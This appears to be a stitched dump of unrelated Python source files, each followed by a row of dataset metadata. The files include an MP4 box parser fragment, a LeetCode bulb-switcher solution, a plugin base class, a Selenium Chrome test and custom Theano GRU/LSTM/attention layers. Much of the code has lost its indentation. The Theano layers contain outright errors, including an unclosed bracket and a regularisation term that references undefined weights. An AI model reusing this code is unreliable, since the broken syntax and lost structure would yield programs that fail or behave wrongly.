self.creation_time, = struct.unpack('>I', data.read(4))
self.modification_time, = struct.unpack('>I', data.read(4))
self.timescale, = struct.unpack('>I', data.read(4))
self.duration, = struct.unpack('>I', data.read(4))
else:
self.creation_time, = struct.unpack('>Q', data.read(8))
self.modification_time, = struct.unpack('>Q', data.read(8))
self.timescale, = struct.unpack('>I', data.read(4))
self.duration, = struct.unpack('>Q', data.read(8))
data.forward(4)
class BoxMinf(Box):
boxtype = 'minf'
direct_children = True
class BoxStbl(Box):
boxtype = 'stbl'
direct_children = True
class BoxStts(Box):
boxtype = 'stts'
def _parse(self, data):
self.version = data.read(1)
self.flag = data.read(3)
self.entry_count, = struct.unpack('>I', data.read(4))
self._entries = data.read(self.entry_count*8)
def iter_time_to_sample(self):
offset = 0
end_offset = self.entry_count*8
while offset + 8 <= end_offset:
yield struct.unpack('>I', self._entries[offset:offset+4])[0], struct.unpack('>I', self._entries[offset+4:offset+8])[0]
offset += 8
def sample_time(self, sample):
accum_samples = 0
accum_time = 0
for sample_count, sample_delta in self.iter_time_to_sample():
if sample < accum_samples + sample_count:
return accum_time + (sample - accum_samples)*sample_delta
accum_samples += sample_count
accum_time += sample_count*sample_delta
class BoxStss(Box):
    # returned sample numbers start from 0 instead of from 1
boxtype = 'stss'
def _parse(self, data):
self.version = data.read(1)
self.flag = data.read(3)
self.entry_count, = struct.unpack('>I', data.read(4))
self._entries = data.read(self.entry_count*4)
def sync_sample(self, index):
if index+1 > self.entry_count:
raise Exception('stss index {} too large'.format(index))
return struct.unpack('>I', self._entries[index*4:index*4+4])[0] - 1
def iter_sync_sample(self):
offset = 0
end_offset = self.entry_count*4
while offset + 4 <= end_offset:
yield struct.unpack('>I', self._entries[offset:offset+4])[0] - 1
offset += 4
if __name__ == '__main__':
def print_all_children(box, prefix=''):
for child in box.iter_child():
print prefix, child.type
print_all_children(child, prefix+' ')
with open('ted.mp4', 'rb') as f:
data = FileCache(f)
mp4 = BoxRoot(data)
print_all_children(mp4)
print '\nstss data:'
for trak in mp4.find_children('trak', deep=True):
stts = trak.find_children('stts', deep=True, only_first=True)
stss = trak.find_children('stss', deep=True, only_first=True)
mdhd = trak.find_children('mdhd', deep=True, only_first=True)
if stts and stss:
for sync_sample in stss.iter_sync_sample():
print sync_sample, stts.sample_time(sync_sample), float(stts.sample_time(sync_sample))/mdhd.timescale
| gpl-3.0 | -415,757,000,598,475,300 | 29.241722 | 130 | 0.545604 | false | 3.775527 | false | false | false |
Shuailong/Leetcode | solutions/bulb-switcher.py | 1 | 1128 | #!/usr/bin/env python
# encoding: utf-8
"""
bulb-switcher.py
Created by Shuailong on 2015-12-19.
https://leetcode.com/problems/bulb-switcher.
"""
'''Key insight: find the pattern behind the toggling and rewrite the solution in closed form.'''
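# Added note: bulb i is toggled once for every divisor of i, so it stays on exactly when
# i has an odd number of divisors, i.e. when i is a perfect square.  The answer is the
# count of perfect squares <= n, which is floor(sqrt(n)).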
from math import floor,sqrt
class Solution1(object):
'''Too time consuming'''
def factors(self,n):
'''
How many factors does the integer n have?
'''
if n == 1:
return 1
count = 0
for i in range(2, n):
if n % i == 0:
count += 1
return count+2
def bulbSwitch(self, n):
"""
:type n: int
:rtype: int
"""
count = 0
for i in range(1, n+1):
if self.factors(i) % 2 == 1:
count += 1
return count
class Solution(object):
def bulbSwitch(self,n):
"""
:type n: int
:rtype: int
"""
return int(floor(sqrt(n)))
def main():
solution = Solution()
solution1 = Solution1()
for n in range(1,20):
print n, solution.bulbSwitch(n)
if __name__ == '__main__':
main()
| mit | -5,968,391,800,125,050,000 | 16.369231 | 49 | 0.489362 | false | 3.54717 | false | false | false |
kif/UPBL09a | dahu/plugin.py | 1 | 5115 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
"""
Data Analysis Highly tailored for Upbl09a
"""
from __future__ import with_statement, print_function, absolute_import, division
__authors__ = ["Jérôme Kieffer"]
__contact__ = "[email protected]"
__license__ = "MIT"
__copyright__ = "European Synchrotron Radiation Facility, Grenoble, France"
__date__ = "31/10/2018"
__status__ = "production"
from .factory import plugin_factory, register
from .utils import fully_qualified_name, get_workdir
import os
import logging
import cProfile
logger = logging.getLogger("dahu.plugin")
class Plugin(object):
"""
    A plugin is instantiated
* Gets its input parameters as a dictionary from the setup method
* Performs some work in the process
* Sets the result as output attribute, should be a dictionary
* The process can be an infinite loop or a server which can be aborted using the abort method
"""
DEFAULT_SET_UP = "setup" # name of the method used to set-up the plugin (close connection, files)
DEFAULT_PROCESS = "process" # specify how to run the default processing
DEFAULT_TEAR_DOWN = "teardown" # name of the method used to tear-down the plugin (close connection, files)
DEFAULT_ABORT = "abort" # name of the method used to abort the plugin (if any. Tear_Down will be called)
def __init__(self):
"""
We assume an empty constructor
"""
self.input = {}
self.output = {}
self._logging = [] # stores the logging information to send back
self.is_aborted = False
self.__profiler = None
def get_name(self):
return self.__class__.__name__
def setup(self, kwargs=None):
"""
        This is the second constructor to set up
input variables and possibly initialize
some objects
"""
if kwargs is not None:
self.input.update(kwargs)
if self.input.get("do_profiling"):
self.__profiler = cProfile.Profile()
self.__profiler.enable()
def process(self):
"""
main processing of the plugin
"""
pass
def teardown(self):
"""
method used to tear-down the plugin (close connection, files)
This is always run, even if process fails
"""
self.output["logging"] = self._logging
if self.input.get("do_profiling"):
self.__profiler.disable()
name = "%05i_%s.%s.profile" % (self.input.get("job_id", 0), self.__class__.__module__, self.__class__.__name__)
profile_file = os.path.join(get_workdir(), name)
self.log_error("Profiling information in %s" % profile_file, do_raise=False)
self.__profiler.dump_stats(profile_file)
def get_info(self):
"""
"""
return os.linesep.join(self._logging)
def abort(self):
"""
Method called to stop a server process
"""
self.is_aborted = True
def log_error(self, txt, do_raise=True):
"""
Way to log errors and raise error
"""
if do_raise:
err = "ERROR in %s: %s" % (self.get_name(), txt)
logger.error(err)
else:
err = "Warning in %s: %s" % (self.get_name(), txt)
logger.warning(err)
self._logging.append(err)
if do_raise:
raise RuntimeError(err)
def log_warning(self, txt):
"""
Way to log warning
"""
err = "Warning in %s: %s" % (self.get_name(), txt)
logger.warning(err)
self._logging.append(err)
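# Minimal illustrative subclass (added sketch, not part of the original module; the
# class name is hypothetical).  The expected lifecycle is setup(kwargs) -> process()
# -> teardown(), with results placed in self.output:
#
#     class PluginExample(Plugin):
#         def process(self):
#             self.output["result"] = self.input.get("value")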
class PluginFromFunction(Plugin):
"""
Template class to build a plugin from a function
"""
def __init__(self):
"""
:param funct: function to be wrapped
"""
Plugin.__init__(self)
def __call__(self, **kwargs):
"""
Behaves like a normal function: for debugging
"""
self.input.update(kwargs)
self.process()
self.teardown()
return self.output["result"]
def process(self):
if self.input is None:
print("PluginFromFunction.process: self.input is None !!! %s", self.input)
else:
funct_input = self.input.copy()
if "job_id" in funct_input:
funct_input.pop("job_id")
if "plugin_name" in funct_input:
funct_input.pop("plugin_name")
self.output["result"] = self.function(**funct_input)
def plugin_from_function(function):
"""
Create a plugin class from a given function and registers it into the
:param function: any function
:return: plugin name to be used by the plugin_factory to get an instance
"""
logger.debug("creating plugin from function %s" % function.__name__)
class_name = function.__module__ + "." + function.__name__
klass = type(class_name, (PluginFromFunction,),
{'function': staticmethod(function),
"__doc__": function.__doc__})
plugin_factory.register(klass, class_name)
return class_name
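# Illustrative use of plugin_from_function (added sketch; the wrapped function is
# hypothetical).  The returned dotted name ("<module>.<function>") identifies the
# generated class registered in plugin_factory:
#
#     def double(x):
#         "Return twice the input."
#         return 2 * x
#
#     name = plugin_from_function(double)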
| gpl-2.0 | -6,533,337,136,667,705,000 | 29.987879 | 123 | 0.584588 | false | 3.95743 | false | false | false |
MikeTheGreat/GLT | Tests/SeleniumTest.py | 1 | 1553 | """Testing the PyUnit / Selenium (WebDriver for Chrome) integration"""
import unittest
from selenium import webdriver
from selenium.webdriver.support.ui import WebDriverWait # available since 2.4.0
from selenium.webdriver.support import expected_conditions as EC # available since 2.26.0
class TestSelenium(unittest.TestCase):
""""Apparently PyUnit looks for classes that inherit from TestCase """
def test_chrome(self):
"""Can I get chrome to work via WebDriver?"""
# Create a new instance of the Chrome driver
driver = webdriver.Chrome()
# go to the google home page
driver.get("http://www.google.com")
# the page is ajaxy so the title is originally this:
print driver.title
# find the element that's name attribute is q (the google search box)
input_element = driver.find_element_by_name("q")
# type in the search
input_element.send_keys("cheese!")
# submit the form (although google automatically searches now without submitting)
input_element.submit()
try:
# we have to wait for the page to refresh, the last thing that seems
# to be updated is the title
WebDriverWait(driver, 10).until(EC.title_contains("cheese!"))
# You should see "cheese! - Google Search"
print driver.title
if driver.title != "cheese! - Google Search":
self.fail()
finally:
driver.quit()
if __name__ == '__main__':
unittest.main()
| gpl-3.0 | -2,201,033,008,625,944,800 | 32.76087 | 89 | 0.637476 | false | 4.437143 | true | false | false |
chuckgu/Alphabeta | theano/library/Modified_Layers.py | 1 | 23038 | import theano
import theano.tensor as T
import numpy as np
from Initializations import glorot_uniform,zero,alloc_zeros_matrix,glorot_normal,numpy_floatX,orthogonal,one,uniform
import theano.typed_list
from theano.sandbox.rng_mrg import MRG_RandomStreams as RandomStreams
from Activations import relu,LeakyReLU,tanh,sigmoid,linear,mean,max,softmax,hard_sigmoid
from Recurrent_Layers import Recurrent
from Layers import dropout_layer
class SGRU(Recurrent):
def __init__(self,n_in,n_hidden,n_seg=4,activation='tanh',return_seq=True):
self.n_in=int(n_in)
self.n_hidden=int(n_hidden)
self.n_seg=int(n_seg)
self.input= T.tensor3()
self.x_mask=T.matrix()
self.activation=eval(activation)
self.return_seq=return_seq
self.U_z = glorot_uniform((n_hidden,n_hidden))
self.W_z1 = glorot_uniform((n_in,n_hidden/4))
self.b_z1 = zero((n_hidden/4,))
self.W_z2 = glorot_uniform((n_in,n_hidden/4))
self.b_z2 = zero((n_hidden/4,))
self.W_z3 = glorot_uniform((n_in,n_hidden/4))
self.b_z3 = zero((n_hidden/4,))
self.W_z4 = glorot_uniform((n_in,n_hidden/4))
self.b_z4 = zero((n_hidden/4,))
self.U_r = glorot_uniform((n_hidden,n_hidden))
self.W_r1 = glorot_uniform((n_in,n_hidden/4))
self.b_r1 = zero((n_hidden/4,))
self.W_r2 = glorot_uniform((n_in,n_hidden/4))
self.b_r2 = zero((n_hidden/4,))
self.W_r3 = glorot_uniform((n_in,n_hidden/4))
self.b_r3 = zero((n_hidden/4,))
self.W_r4 = glorot_uniform((n_in,n_hidden/4))
self.b_r4 = zero((n_hidden/4,))
self.U_h = glorot_uniform((n_hidden,n_hidden))
self.W_h1 = glorot_uniform((n_in,n_hidden/4))
self.b_h1 = zero((n_hidden/4,))
self.W_h2 = glorot_uniform((n_in,n_hidden/4))
self.b_h2 = zero((n_hidden/4,))
self.W_h3 = glorot_uniform((n_in,n_hidden/4))
self.b_h3 = zero((n_hidden/4,))
self.W_h4 = glorot_uniform((n_in,n_hidden/4))
self.b_h4 = zero((n_hidden/4,))
        self.params = [
            self.U_z, self.W_z1, self.b_z1, self.W_z2, self.b_z2,
            self.W_z3, self.b_z3, self.W_z4, self.b_z4,
            self.U_r, self.W_r1, self.b_r1, self.W_r2, self.b_r2,
            self.W_r3, self.b_r3, self.W_r4, self.b_r4,
            self.U_h, self.W_h1, self.b_h1, self.W_h2, self.b_h2,
            self.W_h3, self.b_h3, self.W_h4, self.b_h4,
        ]
self.L1 = 0
        self.L2_sqr = T.sum(self.U_z**2) + T.sum(self.U_r**2) + T.sum(self.U_h**2)
def _step(self,
xz_t, xr_t, xh_t, mask_tm1,
h_tm1,
u_z, u_r, u_h):
z = hard_sigmoid(xz_t + T.dot(h_tm1, u_z))
r = hard_sigmoid(xr_t + T.dot(h_tm1, u_r))
hh_t = self.activation(xh_t + T.dot(r * h_tm1, u_h))
h_t = z * h_tm1 + (1 - z) * hh_t
h_t=mask_tm1 * h_t + (1. - mask_tm1) * h_tm1
return h_t
def get_output(self, train=False, init_state=None):
X = self.get_input(train)
padded_mask = self.get_mask()[:,:, None].astype('int8')
X = X.dimshuffle((1, 0, 2))
padded_mask = padded_mask.dimshuffle((1, 0, 2))
x_z = T.concatenate([T.dot(X, self.W_z1) + self.b_z1, T.dot(X, self.W_z2) + self.b_z2,T.dot(X, self.W_z3) + self.b_z3,T.dot(X, self.W_z4) + self.b_z4], axis=-1)
x_r = T.concatenate([T.dot(X, self.W_r1) + self.b_r1, T.dot(X, self.W_r2) + self.b_r2,T.dot(X, self.W_r3) + self.b_r3,T.dot(X, self.W_r4) + self.b_r4], axis=-1)
        x_h = T.concatenate([T.dot(X, self.W_h1) + self.b_h1, T.dot(X, self.W_h2) + self.b_h2,T.dot(X, self.W_h3) + self.b_h3,T.dot(X, self.W_h4) + self.b_h4], axis=-1)
if init_state is None: init_state=T.unbroadcast(alloc_zeros_matrix(X.shape[1], self.n_hidden), 1)
h, c = theano.scan(
self._step,
sequences=[x_z, x_r, x_h, padded_mask],
outputs_info=init_state,
non_sequences=[self.U_z, self.U_r, self.U_h])
if self.return_seq is False:
            return h[-1]
return h.dimshuffle((1, 0, 2))
class Attention2(Recurrent):
def __init__(self,n_in,n_hidden,activation='tanh',mode='soft'):
self.n_in=int(n_in)
self.n_hidden=int(n_hidden)
self.input= T.tensor3()
self.input2=T.matrix()
self.x_mask=T.matrix()
#self.activation=eval(activation)
self.mode=mode
self.W_h = glorot_uniform((n_in,n_hidden))
self.b_h = zero((n_hidden,))
self.W_c = glorot_uniform((4096,n_hidden))
self.b_c = zero((n_hidden,))
self.W_v = glorot_uniform((n_hidden,n_hidden))
self.W_l = glorot_uniform((n_hidden,n_hidden))
self.W_lh = glorot_uniform((n_hidden,n_hidden))
self.W_vh = glorot_uniform((n_hidden,n_hidden))
self.U_att= orthogonal((n_hidden,1))
self.b_att= zero((1,))
self.params=[self.W_h,self.b_h,self.W_c,self.b_c,self.W_v,self.W_l,self.U_att,self.b_att,self.W_lh,self.W_vh]
self.L1 = 0
self.L2_sqr = 0
def add_input(self, add_input=None):
self.input2=add_input
def _step(self,h_tm1,p_x,p_xm,ctx):
#visual attention
#ctx=dropout_layer(ctx)
v_a=T.exp(ctx+T.dot(h_tm1,self.W_v))
v_a=v_a/v_a.sum(1, keepdims=True)
ctx_p=ctx*v_a
#linguistic attention
l_a=p_x+T.dot(h_tm1,self.W_l)[None,:,:]
l_a=T.dot(l_a,self.U_att)+self.b_att
l_a=T.exp(l_a.reshape((l_a.shape[0],l_a.shape[1])))
l_a=l_a/l_a.sum(0, keepdims=True)
l_a=l_a*p_xm
p_x_p=(p_x*l_a[:,:,None]).sum(0)
h= T.dot(ctx_p,self.W_vh) + T.dot(p_x_p,self.W_lh)
return h
def get_output(self,train=False):
if self.mode is 'soft':
X = self.get_input(train)
padded_mask = self.get_mask().astype('int8')
X = X.dimshuffle((1, 0, 2))
padded_mask = padded_mask.dimshuffle((1, 0))
p_x = T.dot(X, self.W_h) + self.b_h
ctx = T.dot(self.input2, self.W_c) + self.b_c
ctx=dropout_layer(ctx,0.25)
h, _ = theano.scan(self._step,
#sequences = [X],
outputs_info = T.unbroadcast(alloc_zeros_matrix(X.shape[1], self.n_hidden), 1),
non_sequences=[p_x,padded_mask,ctx],
n_steps=X.shape[0] )
return h[-1]
class Attention3(Recurrent):
def __init__(self,n_in,n_hidden,activation='tanh',mode='soft'):
self.n_in=int(n_in)
self.n_hidden=int(n_hidden)
self.input= T.tensor3()
self.input2=T.matrix()
self.x_mask=T.matrix()
self.activation=eval(activation)
self.mode=mode
self.W_h = glorot_uniform((n_in,n_hidden))
self.b_h = zero((n_hidden,))
self.W_c = glorot_uniform((4096,n_hidden))
self.b_c = zero((n_hidden,))
self.W_v = glorot_uniform((n_hidden,n_hidden))
self.params=[self.W_h,self.b_h,self.W_c,self.b_c,self.W_v]
self.L1 = 0
self.L2_sqr = 0
def add_input(self, add_input=None):
self.input2=add_input
def get_output(self,train=False):
if self.mode is 'soft':
X=self.get_input(train)
img=T.dot(self.input2,self.W_c)+self.b_c
output=self.activation(T.dot(X,self.W_h)+self.b_h+img)
output=T.dot(output,self.W_v)
#x_mask=self.x_mask.astype('int8')
e=T.exp(output)
e=e/e.sum(1, keepdims=True)
#e=e*x_mask
output=(img*e)+X
return output
class GRU2(Recurrent):
def __init__(self,n_in,n_hidden,activation='tanh',return_seq=True):
self.n_in=int(n_in)
self.n_hidden=int(n_hidden)
self.input= T.tensor3()
self.input2=T.matrix()
self.x_mask=T.matrix()
self.activation=eval(activation)
self.return_seq=return_seq
self.W_z = glorot_uniform((n_in,n_hidden))
self.U_z = glorot_uniform((n_hidden,n_hidden))
self.b_z = zero((n_hidden,))
self.W_r = glorot_uniform((n_in,n_hidden))
self.U_r = glorot_uniform((n_hidden,n_hidden))
self.b_r = zero((n_hidden,))
self.W_h = glorot_uniform((n_in,n_hidden))
self.U_h = glorot_uniform((n_hidden,n_hidden))
self.b_h = zero((n_hidden,))
self.W_c = glorot_uniform((4096,n_hidden))
self.b_c = zero((n_hidden,))
self.W_hc=glorot_uniform((n_hidden,n_hidden))
self.params = [
self.W_z, self.U_z, self.b_z,
self.W_r, self.U_r, self.b_r,
self.W_h, self.U_h, self.b_h,
self.W_c, self.b_c#, self.W_hc
]
self.L1 = 0
self.L2_sqr = T.sum(self.W_z**2) + T.sum(self.U_z**2)+\
T.sum(self.W_r**2) + T.sum(self.U_r**2)+\
T.sum(self.W_h**2) + T.sum(self.U_h**2)
def _step(self,
xz_t, xr_t, xh_t, mask_tm1,
h_tm1,
u_z, u_r, u_h, ctx):
ctx=dropout_layer(ctx)
c=ctx#+T.dot(h_tm1,self.W_hc)
z = hard_sigmoid(xz_t + T.dot(h_tm1, u_z)+c)
r = hard_sigmoid(xr_t + T.dot(h_tm1, u_r)+c)
hh_t = self.activation(xh_t + T.dot(r * h_tm1, u_h)+c)
h_t = z * h_tm1 + (1 - z) * hh_t
h_t=mask_tm1 * h_t + (1. - mask_tm1) * h_tm1
return h_t
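    # Added note on _step: z is the update gate, r the reset gate and hh_t the candidate
    # state of a standard GRU; the projected context vector ctx (after dropout) is added
    # to every pre-activation, and mask_tm1 keeps h_tm1 unchanged on padded timesteps.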
def add_input(self, add_input=None):
self.input2=add_input
def get_output(self, train=False):
X = self.get_input(train)
padded_mask = self.get_mask()[:,:, None].astype('int8')
X = X.dimshuffle((1, 0, 2))
padded_mask = padded_mask.dimshuffle((1, 0, 2))
x_z = T.dot(X, self.W_z) + self.b_z
x_r = T.dot(X, self.W_r) + self.b_r
x_h = T.dot(X, self.W_h) + self.b_h
ctx = T.dot(self.input2, self.W_c) + self.b_c
init_state=T.unbroadcast(alloc_zeros_matrix(X.shape[1], self.n_hidden), 1)
#init_state=ctx
h, _ = theano.scan(
self._step,
sequences=[x_z, x_r, x_h, padded_mask],
outputs_info=init_state,
non_sequences=[self.U_z, self.U_r, self.U_h, ctx])
if self.return_seq is False: return h[-1]
return h.dimshuffle((1, 0, 2))
class GRU3(Recurrent):
def __init__(self,n_in,n_hidden,activation='tanh',return_seq=True):
self.n_in=int(n_in)
self.n_hidden=int(n_hidden)
self.input= T.tensor3()
self.input2=T.matrix()
self.x_mask=T.matrix()
self.activation=eval(activation)
self.return_seq=return_seq
self.W_z = glorot_uniform((n_in,n_hidden))
self.U_z = glorot_uniform((n_hidden,n_hidden))
self.b_z = zero((n_hidden,))
self.W_r = glorot_uniform((n_in,n_hidden))
self.U_r = glorot_uniform((n_hidden,n_hidden))
self.b_r = zero((n_hidden,))
self.W_h = glorot_uniform((n_in,n_hidden))
self.U_h = glorot_uniform((n_hidden,n_hidden))
self.b_h = zero((n_hidden,))
self.W_c = glorot_uniform((4096,n_hidden))
self.b_c = zero((n_hidden,))
self.W_hc=glorot_uniform((n_hidden,n_hidden))
self.W_hl=glorot_uniform((n_hidden,n_hidden))
self.W_cl=glorot_uniform((n_hidden,n_hidden))
self.params = [
self.W_z, self.U_z, self.b_z,
self.W_r, self.U_r, self.b_r,
self.W_h, self.U_h, self.b_h,
self.W_c, self.b_c, self.W_hc,
self.W_hl,self.W_cl
]
self.L1 = 0
self.L2_sqr = T.sum(self.W_z**2) + T.sum(self.U_z**2)+\
T.sum(self.W_r**2) + T.sum(self.U_r**2)+\
T.sum(self.W_h**2) + T.sum(self.U_h**2)
def _step(self,
xz_t, xr_t, xh_t, mask_tm1,
h_tm1,l_tm1,
u_z, u_r, u_h, ctx):
c=ctx+T.dot(h_tm1,self.W_hc)
c=tanh(c)
c=T.exp(c)
c=c/c.sum(-1, keepdims=True)
c=ctx*c
z = hard_sigmoid(xz_t + T.dot(h_tm1, u_z)+c)
r = hard_sigmoid(xr_t + T.dot(h_tm1, u_r)+c)
hh_t = self.activation(xh_t + T.dot(r * h_tm1, u_h)+c)
h_t = z * h_tm1 + (1 - z) * hh_t
h_t=mask_tm1 * h_t + (1. - mask_tm1) * h_tm1+c
logit=tanh(T.dot(h_t, self.W_hl)+T.dot(c, self.W_cl))
return h_t,logit
def add_input(self, add_input=None):
self.input2=add_input
def get_output(self, train=False):
X = self.get_input(train)
padded_mask = self.get_mask()[:,:, None].astype('int8')
X = X.dimshuffle((1, 0, 2))
padded_mask = padded_mask.dimshuffle((1, 0, 2))
ctx=dropout_layer(self.input2,0.25)
x_z = T.dot(X, self.W_z) + self.b_z
x_r = T.dot(X, self.W_r) + self.b_r
x_h = T.dot(X, self.W_h) + self.b_h
ctx = T.dot(ctx, self.W_c) + self.b_c
init_state=T.unbroadcast(alloc_zeros_matrix(X.shape[1], self.n_hidden), 1)
[h,logit], _ = theano.scan(
self._step,
sequences=[x_z, x_r, x_h, padded_mask],
outputs_info=[init_state,init_state],
non_sequences=[self.U_z, self.U_r, self.U_h,ctx])
if self.return_seq is False: return logit[-1]
return logit.dimshuffle((1, 0, 2))
class LSTM2(Recurrent):
def __init__(self,n_in,n_hidden,activation='tanh',return_seq=True):
self.n_in=int(n_in)
self.n_hidden=int(n_hidden)
self.input= T.tensor3()
self.input2=T.matrix()
self.x_mask=T.matrix()
self.activation=eval(activation)
self.return_seq=return_seq
self.W_i = glorot_uniform((n_in,n_hidden))
self.U_i = orthogonal((n_hidden,n_hidden))
self.b_i = zero((n_hidden,))
self.W_f = glorot_uniform((n_in,n_hidden))
self.U_f = orthogonal((n_hidden,n_hidden))
self.b_f = one((n_hidden,))
self.W_c = glorot_uniform((n_in,n_hidden))
self.U_c = orthogonal((n_hidden,n_hidden))
self.b_c = zero((n_hidden,))
self.W_o = glorot_uniform((n_in,n_hidden))
self.U_o = orthogonal((n_hidden,n_hidden))
self.b_o = zero((n_hidden,))
self.params = [
self.W_i, self.U_i, self.b_i,
self.W_c, self.U_c, self.b_c,
self.W_f, self.U_f, self.b_f,
self.W_o, self.U_o, self.b_o,
]
self.L1 = 0
self.L2_sqr = 0
def _step(self,
xi_t, xf_t, xo_t, xc_t, mask_tm1,
h_tm1, c_tm1,
u_i, u_f, u_o, u_c):
i_t = hard_sigmoid(xi_t + T.dot(h_tm1, u_i))
f_t = hard_sigmoid(xf_t + T.dot(h_tm1, u_f))
c_t = f_t * c_tm1 + i_t * self.activation(xc_t + T.dot(h_tm1, u_c))
c_t = mask_tm1 * c_t + (1. - mask_tm1) * c_tm1
o_t = hard_sigmoid(xo_t + T.dot(h_tm1, u_o))
h_t = o_t * self.activation(c_t)
h_t = mask_tm1 * h_t + (1. - mask_tm1) * h_tm1
return h_t, c_t
def add_input(self, add_input=None):
self.input2=add_input
def get_output(self,train=False):
X = self.get_input(train)
padded_mask = self.get_mask()[:,:, None].astype('int8')
X = X.dimshuffle((1, 0, 2))
padded_mask = padded_mask.dimshuffle((1, 0, 2))
xi = T.dot(X, self.W_i) + self.b_i
xf = T.dot(X, self.W_f) + self.b_f
xc = T.dot(X, self.W_c) + self.b_c
xo = T.dot(X, self.W_o) + self.b_o
init_state=self.input2
[h, c], _ = theano.scan(self._step,
sequences=[xi, xf, xo, xc, padded_mask],
outputs_info=[
init_state,
T.unbroadcast(alloc_zeros_matrix(X.shape[1], self.n_hidden), 1)
],
non_sequences=[self.U_i, self.U_f, self.U_o, self.U_c])
if self.return_seq is False: return h[-1]
return h.dimshuffle((1, 0, 2))
class BiDirectionGRU2(Recurrent):
def __init__(self,n_in,n_hidden,activation='tanh',output_mode='concat',return_seq=True):
self.n_in=int(n_in)
if output_mode is 'concat':n_hidden=int(n_hidden/2)
self.n_hidden=int(n_hidden)
self.output_mode = output_mode
self.input= T.tensor3()
self.input2=T.matrix()
self.x_mask=T.matrix()
self.activation=eval(activation)
self.return_seq=return_seq
# forward weights
self.W_z = glorot_uniform((n_in,n_hidden))
self.U_z = glorot_uniform((n_hidden,n_hidden))
self.b_z = zero((n_hidden,))
self.W_r = glorot_uniform((n_in,n_hidden))
self.U_r = glorot_uniform((n_hidden,n_hidden))
self.b_r = zero((n_hidden,))
self.W_h = glorot_uniform((n_in,n_hidden))
self.U_h = glorot_uniform((n_hidden,n_hidden))
self.b_h = zero((n_hidden,))
self.W_c = glorot_uniform((4096,n_hidden))
self.b_c = zero((n_hidden,))
# backward weights
self.Wb_z = glorot_uniform((n_in,n_hidden))
self.Ub_z = glorot_uniform((n_hidden,n_hidden))
self.bb_z = zero((n_hidden,))
self.Wb_r = glorot_uniform((n_in,n_hidden))
self.Ub_r = glorot_uniform((n_hidden,n_hidden))
self.bb_r = zero((n_hidden,))
self.Wb_h = glorot_uniform((n_in,n_hidden))
self.Ub_h = glorot_uniform((n_hidden,n_hidden))
self.bb_h = zero((n_hidden,))
self.Wb_c = glorot_uniform((4096,n_hidden))
self.bb_c = zero((n_hidden,))
self.params = [
self.W_z, self.U_z, self.b_z,
self.W_r, self.U_r, self.b_r,
self.W_h, self.U_h, self.b_h,
self.W_c, self.b_c,
self.Wb_z, self.Ub_z, self.bb_z,
self.Wb_r, self.Ub_r, self.bb_r,
self.Wb_h, self.Ub_h, self.bb_h,
self.Wb_c, self.bb_c
]
self.L1 = T.sum(abs(self.W_z))+T.sum(abs(self.U_z))+\
T.sum(abs(self.W_r))+T.sum(abs(self.U_r))+\
T.sum(abs(self.W_h))+T.sum(abs(self.U_h))+\
T.sum(abs(self.Wb_z))+T.sum(abs(self.Ub_z))+\
T.sum(abs(self.Wb_r))+T.sum(abs(self.Ub_r))+\
T.sum(abs(self.Wb_h))+T.sum(abs(self.Ub_h))
self.L2_sqr = T.sum(self.W_z**2) + T.sum(self.U_z**2)+\
T.sum(self.W_r**2) + T.sum(self.U_r**2)+\
T.sum(self.W_h**2) + T.sum(self.U_h**2)+\
T.sum(self.Wb_z**2) + T.sum(self.Ub_z**2)+\
T.sum(self.Wb_r**2) + T.sum(self.Ub_r**2)+\
T.sum(self.Wb_h**2) + T.sum(self.Ub_h**2)
def _fstep(self,
xz_t, xr_t, xh_t, mask_tm1,
h_tm1,
u_z, u_r, u_h,
ctx):
ctx=dropout_layer(ctx)
z = hard_sigmoid(xz_t + T.dot(h_tm1, u_z)+ctx)
r = hard_sigmoid(xr_t + T.dot(h_tm1, u_r)+ctx)
hh_t = self.activation(xh_t + T.dot(r * h_tm1, u_h)+ctx)
h_t = z * h_tm1 + (1 - z) * hh_t
h_t=mask_tm1 * h_t + (1. - mask_tm1) * h_tm1
return h_t
def _bstep(self,
xz_t, xr_t, xh_t, mask_tm1,
h_tm1,
u_z, u_r, u_h,
ctx):
ctx=dropout_layer(ctx)
z = hard_sigmoid(xz_t + T.dot(h_tm1, u_z)+ctx)
r = hard_sigmoid(xr_t + T.dot(h_tm1, u_r)+ctx)
hh_t = self.activation(xh_t + T.dot(r * h_tm1, u_h)+ctx)
h_t = z * h_tm1 + (1 - z) * hh_t
h_t=mask_tm1 * h_t + (1. - mask_tm1) * h_tm1
return h_t
def get_forward_output(self,train=False):
X = self.get_input(train)
padded_mask = self.get_mask()[:,:, None].astype('int8')
X = X.dimshuffle((1, 0, 2))
padded_mask = padded_mask.dimshuffle((1, 0, 2))
x_z = T.dot(X, self.W_z) + self.b_z
x_r = T.dot(X, self.W_r) + self.b_r
x_h = T.dot(X, self.W_h) + self.b_h
ctx = T.dot(self.input2, self.W_c) + self.b_c
#init_state=self.input2
init_state=T.unbroadcast(alloc_zeros_matrix(X.shape[1], self.n_hidden), 1)
h, c = theano.scan(
self._fstep,
sequences=[x_z, x_r, x_h, padded_mask],
outputs_info=init_state,
non_sequences=[self.U_z, self.U_r, self.U_h,ctx])
if self.return_seq is False: return h[-1]
return h.dimshuffle((1, 0, 2))
def get_backward_output(self,train=False):
X = self.get_input(train)
padded_mask = self.get_mask()[:,:, None].astype('int8')
X = X.dimshuffle((1, 0, 2))
padded_mask = padded_mask.dimshuffle((1, 0, 2))
x_z = T.dot(X, self.Wb_z) + self.bb_z
x_r = T.dot(X, self.Wb_r) + self.bb_r
x_h = T.dot(X, self.Wb_h) + self.bb_h
ctx = T.dot(self.input2, self.Wb_c) + self.bb_c
#init_state=self.input2
init_state=T.unbroadcast(alloc_zeros_matrix(X.shape[1], self.n_hidden), 1)
h, c = theano.scan(
self._bstep,
sequences=[x_z, x_r, x_h, padded_mask],
outputs_info=init_state,
non_sequences=[self.Ub_z, self.Ub_r, self.Ub_h, ctx],go_backwards = True)
if self.return_seq is False: return h[-1]
return h.dimshuffle((1, 0, 2))
def add_input(self, add_input=None):
self.input2=add_input
def get_output(self,train=False):
forward = self.get_forward_output(train)
backward = self.get_backward_output(train)
        if self.output_mode == 'sum':
return forward + backward
        elif self.output_mode == 'concat':
if self.return_seq: axis=2
else: axis=1
return T.concatenate([forward, backward], axis=axis)
else:
raise Exception('output mode is not sum or concat') | gpl-3.0 | 7,263,858,907,643,852,000 | 33.645113 | 168 | 0.489496 | false | 2.740988 | false | false | false |
HKuz/Test_Code | CodeFights/fileNaming.py | 1 | 1488 | #!/usr/local/bin/python
# Code Fights File Naming Problem
